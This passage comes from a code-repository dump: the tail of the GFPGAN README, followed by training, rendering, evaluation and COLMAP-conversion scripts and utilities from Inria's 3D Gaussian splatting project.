FFHQ_eye_mouth_landmarks_512.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/FFHQ_eye_mouth_landmarks_512.pth) 1. [A simple ArcFace model: arcface_resnet18.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/arcface_resnet18.pth) 1. Modify the configuration file `options/train_gfpgan_v1.yml` accordingly. 1. Training > python -m torch.distributed.launch --nproc_per_node=4 --master_port=22021 gfpgan/train.py -opt options/train_gfpgan_v1.yml --launcher pytorch ## :scroll: License and Acknowledgement GFPGAN is released under Apache License Version 2.0. ## BibTeX @InProceedings{wang2021gfpgan, author = {Xintao Wang and Yu Li and Honglun Zhang and Ying Shan}, title = {Towards Real-World Blind Face Restoration with Generative Facial Prior}, booktitle={The IEEE Conference on Computer Vision and Pattern Recognition (CVPR)}, year = {2021} } ## :e-mail: Contact If you have any question, please email `[email protected]` or `[email protected]`.
gaussian-splatting
8a70a8cd6f0d9c0a14f564844ead2d1147d5a7ac
File: metrics.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # from pathlib import Path import os from PIL import Image import torch import torchvision.transforms.functional as tf from utils.loss_utils import ssim from lpipsPyTorch import lpips import json from tqdm import tqdm from utils.image_utils import psnr from argparse import ArgumentParser def readImages(renders_dir, gt_dir): renders = [] gts = [] image_names = [] for fname in os.listdir(renders_dir): render = Image.open(renders_dir / fname) gt = Image.open(gt_dir / fname) renders.append(tf.to_tensor(render).unsqueeze(0)[:, :3, :, :].cuda()) gts.append(tf.to_tensor(gt).unsqueeze(0)[:, :3, :, :].cuda()) image_names.append(fname) return renders, gts, image_names def evaluate(model_paths): full_dict = {} per_view_dict = {} full_dict_polytopeonly = {} per_view_dict_polytopeonly = {} print("") for scene_dir in model_paths: try: print("Scene:", scene_dir) full_dict[scene_dir] = {} per_view_dict[scene_dir] = {} full_dict_polytopeonly[scene_dir] = {} per_view_dict_polytopeonly[scene_dir] = {} test_dir = Path(scene_dir) / "test" for method in os.listdir(test_dir): print("Method:", method) full_dict[scene_dir][method] = {} per_view_dict[scene_dir][method] = {} full_dict_polytopeonly[scene_dir][method] = {} per_view_dict_polytopeonly[scene_dir][method] = {} method_dir = test_dir / method gt_dir = method_dir/ "gt" renders_dir = method_dir / "renders" renders, gts, image_names = readImages(renders_dir, gt_dir) ssims = [] psnrs = [] lpipss = [] for idx in tqdm(range(len(renders)), desc="Metric evaluation progress"): ssims.append(ssim(renders[idx], gts[idx])) psnrs.append(psnr(renders[idx], gts[idx])) lpipss.append(lpips(renders[idx], gts[idx], net_type='vgg')) print(" SSIM : {:>12.7f}".format(torch.tensor(ssims).mean(), ".5")) print(" PSNR : {:>12.7f}".format(torch.tensor(psnrs).mean(), ".5")) print(" LPIPS: {:>12.7f}".format(torch.tensor(lpipss).mean(), ".5")) print("") full_dict[scene_dir][method].update({"SSIM": torch.tensor(ssims).mean().item(), "PSNR": torch.tensor(psnrs).mean().item(), "LPIPS": torch.tensor(lpipss).mean().item()}) per_view_dict[scene_dir][method].update({"SSIM": {name: ssim for ssim, name in zip(torch.tensor(ssims).tolist(), image_names)}, "PSNR": {name: psnr for psnr, name in zip(torch.tensor(psnrs).tolist(), image_names)}, "LPIPS": {name: lp for lp, name in zip(torch.tensor(lpipss).tolist(), image_names)}}) with open(scene_dir + "/results.json", 'w') as fp: json.dump(full_dict[scene_dir], fp, indent=True) with open(scene_dir + "/per_view.json", 'w') as fp: json.dump(per_view_dict[scene_dir], fp, indent=True) except: print("Unable to compute metrics for model", scene_dir) if __name__ == "__main__": device = torch.device("cuda:0") torch.cuda.set_device(device) # Set up command line argument parser parser = ArgumentParser(description="Training script parameters") parser.add_argument('--model_paths', '-m', required=True, nargs="+", type=str, default=[]) args = parser.parse_args() evaluate(args.model_paths) File: render.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch from scene import Scene import os from tqdm import tqdm from os import makedirs from gaussian_renderer import render import torchvision from utils.general_utils import safe_state from argparse import ArgumentParser from arguments import ModelParams, PipelineParams, get_combined_args from gaussian_renderer import GaussianModel def render_set(model_path, name, iteration, views, gaussians, pipeline, background): render_path = os.path.join(model_path, name, "ours_{}".format(iteration), "renders") gts_path = os.path.join(model_path, name, "ours_{}".format(iteration), "gt") makedirs(render_path, exist_ok=True) makedirs(gts_path, exist_ok=True) for idx, view in enumerate(tqdm(views, desc="Rendering progress")): rendering = render(view, gaussians, pipeline, background)["render"] gt = view.original_image[0:3, :, :] torchvision.utils.save_image(rendering, os.path.join(render_path, '{0:05d}'.format(idx) + ".png")) torchvision.utils.save_image(gt, os.path.join(gts_path, '{0:05d}'.format(idx) + ".png")) def render_sets(dataset : ModelParams, iteration : int, pipeline : PipelineParams, skip_train : bool, skip_test : bool): with torch.no_grad(): gaussians = GaussianModel(dataset.sh_degree) scene = Scene(dataset, gaussians, load_iteration=iteration, shuffle=False) bg_color = [1,1,1] if dataset.white_background else [0, 0, 0] background = torch.tensor(bg_color, dtype=torch.float32, device="cuda") if not skip_train: render_set(dataset.model_path, "train", scene.loaded_iter, scene.getTrainCameras(), gaussians, pipeline, background) if not skip_test: render_set(dataset.model_path, "test", scene.loaded_iter, scene.getTestCameras(), gaussians, pipeline, background) if __name__ == "__main__": # Set up command line argument parser parser = ArgumentParser(description="Testing script parameters") model = ModelParams(parser, sentinel=True) pipeline = PipelineParams(parser) parser.add_argument("--iteration", default=-1, type=int) parser.add_argument("--skip_train", action="store_true") parser.add_argument("--skip_test", action="store_true") parser.add_argument("--quiet", action="store_true") args = get_combined_args(parser) print("Rendering " + args.model_path) # Initialize system state (RNG) safe_state(args.quiet) render_sets(model.extract(args), args.iteration, pipeline.extract(args), args.skip_train, args.skip_test) File: full_eval.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import os from argparse import ArgumentParser mipnerf360_outdoor_scenes = ["bicycle", "flowers", "garden", "stump", "treehill"] mipnerf360_indoor_scenes = ["room", "counter", "kitchen", "bonsai"] tanks_and_temples_scenes = ["truck", "train"] deep_blending_scenes = ["drjohnson", "playroom"] parser = ArgumentParser(description="Full evaluation script parameters") parser.add_argument("--skip_training", action="store_true") parser.add_argument("--skip_rendering", action="store_true") parser.add_argument("--skip_metrics", action="store_true") parser.add_argument("--output_path", default="./eval") args, _ = parser.parse_known_args() all_scenes = [] all_scenes.extend(mipnerf360_outdoor_scenes) all_scenes.extend(mipnerf360_indoor_scenes) all_scenes.extend(tanks_and_temples_scenes) all_scenes.extend(deep_blending_scenes) if not args.skip_training or not args.skip_rendering: parser.add_argument('--mipnerf360', "-m360", required=True, type=str) parser.add_argument("--tanksandtemples", "-tat", required=True, type=str) parser.add_argument("--deepblending", "-db", required=True, type=str) args = parser.parse_args() if not args.skip_training: common_args = " --quiet --eval --test_iterations -1 " for scene in mipnerf360_outdoor_scenes: source = args.mipnerf360 + "/" + scene os.system("python train.py -s " + source + " -i images_4 -m " + args.output_path + "/" + scene + common_args) for scene in mipnerf360_indoor_scenes: source = args.mipnerf360 + "/" + scene os.system("python train.py -s " + source + " -i images_2 -m " + args.output_path + "/" + scene + common_args) for scene in tanks_and_temples_scenes: source = args.tanksandtemples + "/" + scene os.system("python train.py -s " + source + " -m " + args.output_path + "/" + scene + common_args) for scene in deep_blending_scenes: source = args.deepblending + "/" + scene os.system("python train.py -s " + source + " -m " + args.output_path + "/" + scene + common_args) if not args.skip_rendering: all_sources = [] for scene in mipnerf360_outdoor_scenes: all_sources.append(args.mipnerf360 + "/" + scene) for scene in mipnerf360_indoor_scenes: all_sources.append(args.mipnerf360 + "/" + scene) for scene in tanks_and_temples_scenes: all_sources.append(args.tanksandtemples + "/" + scene) for scene in deep_blending_scenes: all_sources.append(args.deepblending + "/" + scene) common_args = " --quiet --eval --skip_train" for scene, source in zip(all_scenes, all_sources): os.system("python render.py --iteration 7000 -s " + source + " -m " + args.output_path + "/" + scene + common_args) os.system("python render.py --iteration 30000 -s " + source + " -m " + args.output_path + "/" + scene + common_args) if not args.skip_metrics: scenes_string = "" for scene in all_scenes: scenes_string += "\"" + args.output_path + "/" + scene + "\" " os.system("python metrics.py -m " + scenes_string) File: convert.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import os import logging from argparse import ArgumentParser import shutil # This Python script is based on the shell converter script provided in the MipNerF 360 repository. parser = ArgumentParser("Colmap converter") parser.add_argument("--no_gpu", action='store_true') parser.add_argument("--skip_matching", action='store_true') parser.add_argument("--source_path", "-s", required=True, type=str) parser.add_argument("--camera", default="OPENCV", type=str) parser.add_argument("--colmap_executable", default="", type=str) parser.add_argument("--resize", action="store_true") parser.add_argument("--magick_executable", default="", type=str) args = parser.parse_args() colmap_command = '"{}"'.format(args.colmap_executable) if len(args.colmap_executable) > 0 else "colmap" magick_command = '"{}"'.format(args.magick_executable) if len(args.magick_executable) > 0 else "magick" use_gpu = 1 if not args.no_gpu else 0 if not args.skip_matching: os.makedirs(args.source_path + "/distorted/sparse", exist_ok=True) ## Feature extraction feat_extracton_cmd = colmap_command + " feature_extractor "\ "--database_path " + args.source_path + "/distorted/database.db \ --image_path " + args.source_path + "/input \ --ImageReader.single_camera 1 \ --ImageReader.camera_model " + args.camera + " \ --SiftExtraction.use_gpu " + str(use_gpu) exit_code = os.system(feat_extracton_cmd) if exit_code != 0: logging.error(f"Feature extraction failed with code {exit_code}. Exiting.") exit(exit_code) ## Feature matching feat_matching_cmd = colmap_command + " exhaustive_matcher \ --database_path " + args.source_path + "/distorted/database.db \ --SiftMatching.use_gpu " + str(use_gpu) exit_code = os.system(feat_matching_cmd) if exit_code != 0: logging.error(f"Feature matching failed with code {exit_code}. Exiting.") exit(exit_code) ### Bundle adjustment # The default Mapper tolerance is unnecessarily large, # decreasing it speeds up bundle adjustment steps. mapper_cmd = (colmap_command + " mapper \ --database_path " + args.source_path + "/distorted/database.db \ --image_path " + args.source_path + "/input \ --output_path " + args.source_path + "/distorted/sparse \ --Mapper.ba_global_function_tolerance=0.000001") exit_code = os.system(mapper_cmd) if exit_code != 0: logging.error(f"Mapper failed with code {exit_code}. Exiting.") exit(exit_code) ### Image undistortion ## We need to undistort our images into ideal pinhole intrinsics. img_undist_cmd = (colmap_command + " image_undistorter \ --image_path " + args.source_path + "/input \ --input_path " + args.source_path + "/distorted/sparse/0 \ --output_path " + args.source_path + "\ --output_type COLMAP") exit_code = os.system(img_undist_cmd) if exit_code != 0: logging.error(f"Mapper failed with code {exit_code}. Exiting.") exit(exit_code) files = os.listdir(args.source_path + "/sparse") os.makedirs(args.source_path + "/sparse/0", exist_ok=True) # Copy each file from the source directory to the destination directory for file in files: if file == '0': continue source_file = os.path.join(args.source_path, "sparse", file) destination_file = os.path.join(args.source_path, "sparse", "0", file) shutil.move(source_file, destination_file) if(args.resize): print("Copying and resizing...") # Resize images. os.makedirs(args.source_path + "/images_2", exist_ok=True) os.makedirs(args.source_path + "/images_4", exist_ok=True) os.makedirs(args.source_path + "/images_8", exist_ok=True) # Get the list of files in the source directory files = os.listdir(args.source_path + "/images") # Copy each file from the source directory to the destination directory for file in files: source_file = os.path.join(args.source_path, "images", file) destination_file = os.path.join(args.source_path, "images_2", file) shutil.copy2(source_file, destination_file) exit_code = os.system(magick_command + " mogrify -resize 50% " + destination_file) if exit_code != 0: logging.error(f"50% resize failed with code {exit_code}. Exiting.") exit(exit_code) destination_file = os.path.join(args.source_path, "images_4", file) shutil.copy2(source_file, destination_file) exit_code = os.system(magick_command + " mogrify -resize 25% " + destination_file) if exit_code != 0: logging.error(f"25% resize failed with code {exit_code}. Exiting.") exit(exit_code) destination_file = os.path.join(args.source_path, "images_8", file) shutil.copy2(source_file, destination_file) exit_code = os.system(magick_command + " mogrify -resize 12.5% " + destination_file) if exit_code != 0: logging.error(f"12.5% resize failed with code {exit_code}. Exiting.") exit(exit_code) print("Done.") File: train.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import os import torch from random import randint from utils.loss_utils import l1_loss, ssim from gaussian_renderer import render, network_gui import sys from scene import Scene, GaussianModel from utils.general_utils import safe_state import uuid from tqdm import tqdm from utils.image_utils import psnr from argparse import ArgumentParser, Namespace from arguments import ModelParams, PipelineParams, OptimizationParams try: from torch.utils.tensorboard import SummaryWriter TENSORBOARD_FOUND = True except ImportError: TENSORBOARD_FOUND = False def training(dataset, opt, pipe, testing_iterations, saving_iterations, checkpoint_iterations, checkpoint, debug_from): first_iter = 0 tb_writer = prepare_output_and_logger(dataset) gaussians = GaussianModel(dataset.sh_degree) scene = Scene(dataset, gaussians) gaussians.training_setup(opt) if checkpoint: (model_params, first_iter) = torch.load(checkpoint) gaussians.restore(model_params, opt) bg_color = [1, 1, 1] if dataset.white_background else [0, 0, 0] background = torch.tensor(bg_color, dtype=torch.float32, device="cuda") iter_start = torch.cuda.Event(enable_timing = True) iter_end = torch.cuda.Event(enable_timing = True) viewpoint_stack = None ema_loss_for_log = 0.0 progress_bar = tqdm(range(first_iter, opt.iterations), desc="Training progress") first_iter += 1 for iteration in range(first_iter, opt.iterations + 1): if network_gui.conn == None: network_gui.try_connect() while network_gui.conn != None: try: net_image_bytes = None custom_cam, do_training, pipe.convert_SHs_python, pipe.compute_cov3D_python, keep_alive, scaling_modifer = network_gui.receive() if custom_cam != None: net_image = render(custom_cam, gaussians, pipe, background, scaling_modifer)["render"] net_image_bytes = memoryview((torch.clamp(net_image, min=0, max=1.0) * 255).byte().permute(1, 2, 0).contiguous().cpu().numpy()) network_gui.send(net_image_bytes, dataset.source_path) if do_training and ((iteration < int(opt.iterations)) or not keep_alive): break except Exception as e: network_gui.conn = None iter_start.record() gaussians.update_learning_rate(iteration) # Every 1000 its we increase the levels of SH up to a maximum degree if iteration % 1000 == 0: gaussians.oneupSHdegree() # Pick a random Camera if not viewpoint_stack: viewpoint_stack = scene.getTrainCameras().copy() viewpoint_cam = viewpoint_stack.pop(randint(0, len(viewpoint_stack)-1)) # Render if (iteration - 1) == debug_from: pipe.debug = True bg = torch.rand((3), device="cuda") if opt.random_background else background render_pkg = render(viewpoint_cam, gaussians, pipe, bg) image, viewspace_point_tensor, visibility_filter, radii = render_pkg["render"], render_pkg["viewspace_points"], render_pkg["visibility_filter"], render_pkg["radii"] # Loss gt_image = viewpoint_cam.original_image.cuda() Ll1 = l1_loss(image, gt_image) loss = (1.0 - opt.lambda_dssim) * Ll1 + opt.lambda_dssim * (1.0 - ssim(image, gt_image)) loss.backward() iter_end.record() with torch.no_grad(): # Progress bar ema_loss_for_log = 0.4 * loss.item() + 0.6 * ema_loss_for_log if iteration % 10 == 0: progress_bar.set_postfix({"Loss": f"{ema_loss_for_log:.{7}f}"}) progress_bar.update(10) if iteration == opt.iterations: progress_bar.close() # Log and save training_report(tb_writer, iteration, Ll1, loss, l1_loss, iter_start.elapsed_time(iter_end), testing_iterations, scene, render, (pipe, background)) if (iteration in saving_iterations): print("\n[ITER {}] Saving Gaussians".format(iteration)) scene.save(iteration) # Densification if iteration < opt.densify_until_iter: # Keep track of max radii in image-space for pruning gaussians.max_radii2D[visibility_filter] = torch.max(gaussians.max_radii2D[visibility_filter], radii[visibility_filter]) gaussians.add_densification_stats(viewspace_point_tensor, visibility_filter) if iteration > opt.densify_from_iter and iteration % opt.densification_interval == 0: size_threshold = 20 if iteration > opt.opacity_reset_interval else None gaussians.densify_and_prune(opt.densify_grad_threshold, 0.005, scene.cameras_extent, size_threshold) if iteration % opt.opacity_reset_interval == 0 or (dataset.white_background and iteration == opt.densify_from_iter): gaussians.reset_opacity() # Optimizer step if iteration < opt.iterations: gaussians.optimizer.step() gaussians.optimizer.zero_grad(set_to_none = True) if (iteration in checkpoint_iterations): print("\n[ITER {}] Saving Checkpoint".format(iteration)) torch.save((gaussians.capture(), iteration), scene.model_path + "/chkpnt" + str(iteration) + ".pth") def prepare_output_and_logger(args): if not args.model_path: if os.getenv('OAR_JOB_ID'): unique_str=os.getenv('OAR_JOB_ID') else: unique_str = str(uuid.uuid4()) args.model_path = os.path.join("./output/", unique_str[0:10]) # Set up output folder print("Output folder: {}".format(args.model_path)) os.makedirs(args.model_path, exist_ok = True) with open(os.path.join(args.model_path, "cfg_args"), 'w') as cfg_log_f: cfg_log_f.write(str(Namespace(**vars(args)))) # Create Tensorboard writer tb_writer = None if TENSORBOARD_FOUND: tb_writer = SummaryWriter(args.model_path) else: print("Tensorboard not available: not logging progress") return tb_writer def training_report(tb_writer, iteration, Ll1, loss, l1_loss, elapsed, testing_iterations, scene : Scene, renderFunc, renderArgs): if tb_writer: tb_writer.add_scalar('train_loss_patches/l1_loss', Ll1.item(), iteration) tb_writer.add_scalar('train_loss_patches/total_loss', loss.item(), iteration) tb_writer.add_scalar('iter_time', elapsed, iteration) # Report test and samples of training set if iteration in testing_iterations: torch.cuda.empty_cache() validation_configs = ({'name': 'test', 'cameras' : scene.getTestCameras()}, {'name': 'train', 'cameras' : [scene.getTrainCameras()[idx % len(scene.getTrainCameras())] for idx in range(5, 30, 5)]}) for config in validation_configs: if config['cameras'] and len(config['cameras']) > 0: l1_test = 0.0 psnr_test = 0.0 for idx, viewpoint in enumerate(config['cameras']): image = torch.clamp(renderFunc(viewpoint, scene.gaussians, *renderArgs)["render"], 0.0, 1.0) gt_image = torch.clamp(viewpoint.original_image.to("cuda"), 0.0, 1.0) if tb_writer and (idx < 5): tb_writer.add_images(config['name'] + "_view_{}/render".format(viewpoint.image_name), image[None], global_step=iteration) if iteration == testing_iterations[0]: tb_writer.add_images(config['name'] + "_view_{}/ground_truth".format(viewpoint.image_name), gt_image[None], global_step=iteration) l1_test += l1_loss(image, gt_image).mean().double() psnr_test += psnr(image, gt_image).mean().double() psnr_test /= len(config['cameras']) l1_test /= len(config['cameras']) print("\n[ITER {}] Evaluating {}: L1 {} PSNR {}".format(iteration, config['name'], l1_test, psnr_test)) if tb_writer: tb_writer.add_scalar(config['name'] + '/loss_viewpoint - l1_loss', l1_test, iteration) tb_writer.add_scalar(config['name'] + '/loss_viewpoint - psnr', psnr_test, iteration) if tb_writer: tb_writer.add_histogram("scene/opacity_histogram", scene.gaussians.get_opacity, iteration) tb_writer.add_scalar('total_points', scene.gaussians.get_xyz.shape[0], iteration) torch.cuda.empty_cache() if __name__ == "__main__": # Set up command line argument parser parser = ArgumentParser(description="Training script parameters") lp = ModelParams(parser) op = OptimizationParams(parser) pp = PipelineParams(parser) parser.add_argument('--ip', type=str, default="127.0.0.1") parser.add_argument('--port', type=int, default=6009) parser.add_argument('--debug_from', type=int, default=-1) parser.add_argument('--detect_anomaly', action='store_true', default=False) parser.add_argument("--test_iterations", nargs="+", type=int, default=[7_000, 30_000]) parser.add_argument("--save_iterations", nargs="+", type=int, default=[7_000, 30_000]) parser.add_argument("--quiet", action="store_true") parser.add_argument("--checkpoint_iterations", nargs="+", type=int, default=[]) parser.add_argument("--start_checkpoint", type=str, default = None) args = parser.parse_args(sys.argv[1:]) args.save_iterations.append(args.iterations) print("Optimizing " + args.model_path) # Initialize system state (RNG) safe_state(args.quiet) # Start GUI server, configure and run training network_gui.init(args.ip, args.port) torch.autograd.set_detect_anomaly(args.detect_anomaly) training(lp.extract(args), op.extract(args), pp.extract(args), args.test_iterations, args.save_iterations, args.checkpoint_iterations, args.start_checkpoint, args.debug_from) # All done print("\nTraining complete.") File: lpipsPyTorch/__init__.py import torch from .modules.lpips import LPIPS def lpips(x: torch.Tensor, y: torch.Tensor, net_type: str = 'alex', version: str = '0.1'): r"""Function that measures Learned Perceptual Image Patch Similarity (LPIPS). Arguments: x, y (torch.Tensor): the input tensors to compare. net_type (str): the network type to compare the features: 'alex' | 'squeeze' | 'vgg'. Default: 'alex'. version (str): the version of LPIPS. Default: 0.1. """ device = x.device criterion = LPIPS(net_type, version).to(device) return criterion(x, y) File: lpipsPyTorch/modules/networks.py from typing import Sequence from itertools import chain import torch import torch.nn as nn from torchvision import models from .utils import normalize_activation def get_network(net_type: str): if net_type == 'alex': return AlexNet() elif net_type == 'squeeze': return SqueezeNet() elif net_type == 'vgg': return VGG16() else: raise NotImplementedError('choose net_type from [alex, squeeze, vgg].') class LinLayers(nn.ModuleList): def __init__(self, n_channels_list: Sequence[int]): super(LinLayers, self).__init__([ nn.Sequential( nn.Identity(), nn.Conv2d(nc, 1, 1, 1, 0, bias=False) ) for nc in n_channels_list ]) for param in self.parameters(): param.requires_grad = False class BaseNet(nn.Module): def __init__(self): super(BaseNet, self).__init__() # register buffer self.register_buffer( 'mean', torch.Tensor([-.030, -.088, -.188])[None, :, None, None]) self.register_buffer( 'std', torch.Tensor([.458, .448, .450])[None, :, None, None]) def set_requires_grad(self, state: bool): for param in chain(self.parameters(), self.buffers()): param.requires_grad = state def z_score(self, x: torch.Tensor): return (x - self.mean) / self.std def forward(self, x: torch.Tensor): x = self.z_score(x) output = [] for i, (_, layer) in enumerate(self.layers._modules.items(), 1): x = layer(x) if i in self.target_layers: output.append(normalize_activation(x)) if len(output) == len(self.target_layers): break return output class SqueezeNet(BaseNet): def __init__(self): super(SqueezeNet, self).__init__() self.layers = models.squeezenet1_1(True).features self.target_layers = [2, 5, 8, 10, 11, 12, 13] self.n_channels_list = [64, 128, 256, 384, 384, 512, 512] self.set_requires_grad(False) class AlexNet(BaseNet): def __init__(self): super(AlexNet, self).__init__() self.layers = models.alexnet(True).features self.target_layers = [2, 5, 8, 10, 12] self.n_channels_list = [64, 192, 384, 256, 256] self.set_requires_grad(False) class VGG16(BaseNet): def __init__(self): super(VGG16, self).__init__() self.layers = models.vgg16(weights=models.VGG16_Weights.IMAGENET1K_V1).features self.target_layers = [4, 9, 16, 23, 30] self.n_channels_list = [64, 128, 256, 512, 512] self.set_requires_grad(False) File: lpipsPyTorch/modules/utils.py from collections import OrderedDict import torch def normalize_activation(x, eps=1e-10): norm_factor = torch.sqrt(torch.sum(x ** 2, dim=1, keepdim=True)) return x / (norm_factor + eps) def get_state_dict(net_type: str = 'alex', version: str = '0.1'): # build url url = 'https://raw.githubusercontent.com/richzhang/PerceptualSimilarity/' \ + f'master/lpips/weights/v{version}/{net_type}.pth' # download old_state_dict = torch.hub.load_state_dict_from_url( url, progress=True, map_location=None if torch.cuda.is_available() else torch.device('cpu') ) # rename keys new_state_dict = OrderedDict() for key, val in old_state_dict.items(): new_key = key new_key = new_key.replace('lin', '') new_key = new_key.replace('model.', '') new_state_dict[new_key] = val return new_state_dict File: lpipsPyTorch/modules/lpips.py import torch import torch.nn as nn from .networks import get_network, LinLayers from .utils import get_state_dict class LPIPS(nn.Module): r"""Creates a criterion that measures Learned Perceptual Image Patch Similarity (LPIPS). Arguments: net_type (str): the network type to compare the features: 'alex' | 'squeeze' | 'vgg'. Default: 'alex'. version (str): the version of LPIPS. Default: 0.1. """ def __init__(self, net_type: str = 'alex', version: str = '0.1'): assert version in ['0.1'], 'v0.1 is only supported now' super(LPIPS, self).__init__() # pretrained network self.net = get_network(net_type) # linear layers self.lin = LinLayers(self.net.n_channels_list) self.lin.load_state_dict(get_state_dict(net_type, version)) def forward(self, x: torch.Tensor, y: torch.Tensor): feat_x, feat_y = self.net(x), self.net(y) diff = [(fx - fy) ** 2 for fx, fy in zip(feat_x, feat_y)] res = [l(d).mean((2, 3), True) for d, l in zip(diff, self.lin)] return torch.sum(torch.cat(res, 0), 0, True) File: gaussian_renderer/__init__.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch import math from diff_gaussian_rasterization import GaussianRasterizationSettings, GaussianRasterizer from scene.gaussian_model import GaussianModel from utils.sh_utils import eval_sh def render(viewpoint_camera, pc : GaussianModel, pipe, bg_color : torch.Tensor, scaling_modifier = 1.0, override_color = None): """ Render the scene. Background tensor (bg_color) must be on GPU! """ # Create zero tensor. We will use it to make pytorch return gradients of the 2D (screen-space) means screenspace_points = torch.zeros_like(pc.get_xyz, dtype=pc.get_xyz.dtype, requires_grad=True, device="cuda") + 0 try: screenspace_points.retain_grad() except: pass # Set up rasterization configuration tanfovx = math.tan(viewpoint_camera.FoVx * 0.5) tanfovy = math.tan(viewpoint_camera.FoVy * 0.5) raster_settings = GaussianRasterizationSettings( image_height=int(viewpoint_camera.image_height), image_width=int(viewpoint_camera.image_width), tanfovx=tanfovx, tanfovy=tanfovy, bg=bg_color, scale_modifier=scaling_modifier, viewmatrix=viewpoint_camera.world_view_transform, projmatrix=viewpoint_camera.full_proj_transform, sh_degree=pc.active_sh_degree, campos=viewpoint_camera.camera_center, prefiltered=False, debug=pipe.debug ) rasterizer = GaussianRasterizer(raster_settings=raster_settings) means3D = pc.get_xyz means2D = screenspace_points opacity = pc.get_opacity # If precomputed 3d covariance is provided, use it. If not, then it will be computed from # scaling / rotation by the rasterizer. scales = None rotations = None cov3D_precomp = None if pipe.compute_cov3D_python: cov3D_precomp = pc.get_covariance(scaling_modifier) else: scales = pc.get_scaling rotations = pc.get_rotation # If precomputed colors are provided, use them. Otherwise, if it is desired to precompute colors # from SHs in Python, do it. If not, then SH -> RGB conversion will be done by rasterizer. shs = None colors_precomp = None if override_color is None: if pipe.convert_SHs_python: shs_view = pc.get_features.transpose(1, 2).view(-1, 3, (pc.max_sh_degree+1)**2) dir_pp = (pc.get_xyz - viewpoint_camera.camera_center.repeat(pc.get_features.shape[0], 1)) dir_pp_normalized = dir_pp/dir_pp.norm(dim=1, keepdim=True) sh2rgb = eval_sh(pc.active_sh_degree, shs_view, dir_pp_normalized) colors_precomp = torch.clamp_min(sh2rgb + 0.5, 0.0) else: shs = pc.get_features else: colors_precomp = override_color # Rasterize visible Gaussians to image, obtain their radii (on screen). rendered_image, radii = rasterizer( means3D = means3D, means2D = means2D, shs = shs, colors_precomp = colors_precomp, opacities = opacity, scales = scales, rotations = rotations, cov3D_precomp = cov3D_precomp) # Those Gaussians that were frustum culled or had a radius of 0 were not visible. # They will be excluded from value updates used in the splitting criteria. return {"render": rendered_image, "viewspace_points": screenspace_points, "visibility_filter" : radii > 0, "radii": radii} File: gaussian_renderer/network_gui.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch import traceback import socket import json from scene.cameras import MiniCam host = "127.0.0.1" port = 6009 conn = None addr = None listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def init(wish_host, wish_port): global host, port, listener host = wish_host port = wish_port listener.bind((host, port)) listener.listen() listener.settimeout(0) def try_connect(): global conn, addr, listener try: conn, addr = listener.accept() print(f"\nConnected by {addr}") conn.settimeout(None) except Exception as inst: pass def read(): global conn messageLength = conn.recv(4) messageLength = int.from_bytes(messageLength, 'little') message = conn.recv(messageLength) return json.loads(message.decode("utf-8")) def send(message_bytes, verify): global conn if message_bytes != None: conn.sendall(message_bytes) conn.sendall(len(verify).to_bytes(4, 'little')) conn.sendall(bytes(verify, 'ascii')) def receive(): message = read() width = message["resolution_x"] height = message["resolution_y"] if width != 0 and height != 0: try: do_training = bool(message["train"]) fovy = message["fov_y"] fovx = message["fov_x"] znear = message["z_near"] zfar = message["z_far"] do_shs_python = bool(message["shs_python"]) do_rot_scale_python = bool(message["rot_scale_python"]) keep_alive = bool(message["keep_alive"]) scaling_modifier = message["scaling_modifier"] world_view_transform = torch.reshape(torch.tensor(message["view_matrix"]), (4, 4)).cuda() world_view_transform[:,1] = -world_view_transform[:,1] world_view_transform[:,2] = -world_view_transform[:,2] full_proj_transform = torch.reshape(torch.tensor(message["view_projection_matrix"]), (4, 4)).cuda() full_proj_transform[:,1] = -full_proj_transform[:,1] custom_cam = MiniCam(width, height, fovy, fovx, znear, zfar, world_view_transform, full_proj_transform) except Exception as e: print("") traceback.print_exc() raise e return custom_cam, do_training, do_shs_python, do_rot_scale_python, keep_alive, scaling_modifier else: return None, None, None, None, None, None File: utils/general_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch import sys from datetime import datetime import numpy as np import random def inverse_sigmoid(x): return torch.log(x/(1-x)) def PILtoTorch(pil_image, resolution): resized_image_PIL = pil_image.resize(resolution) resized_image = torch.from_numpy(np.array(resized_image_PIL)) / 255.0 if len(resized_image.shape) == 3: return resized_image.permute(2, 0, 1) else: return resized_image.unsqueeze(dim=-1).permute(2, 0, 1) def get_expon_lr_func( lr_init, lr_final, lr_delay_steps=0, lr_delay_mult=1.0, max_steps=1000000 ): """ Copied from Plenoxels Continuous learning rate decay function. Adapted from JaxNeRF The returned rate is lr_init when step=0 and lr_final when step=max_steps, and is log-linearly interpolated elsewhere (equivalent to exponential decay). If lr_delay_steps>0 then the learning rate will be scaled by some smooth function of lr_delay_mult, such that the initial learning rate is lr_init*lr_delay_mult at the beginning of optimization but will be eased back to the normal learning rate when steps>lr_delay_steps. :param conf: config subtree 'lr' or similar :param 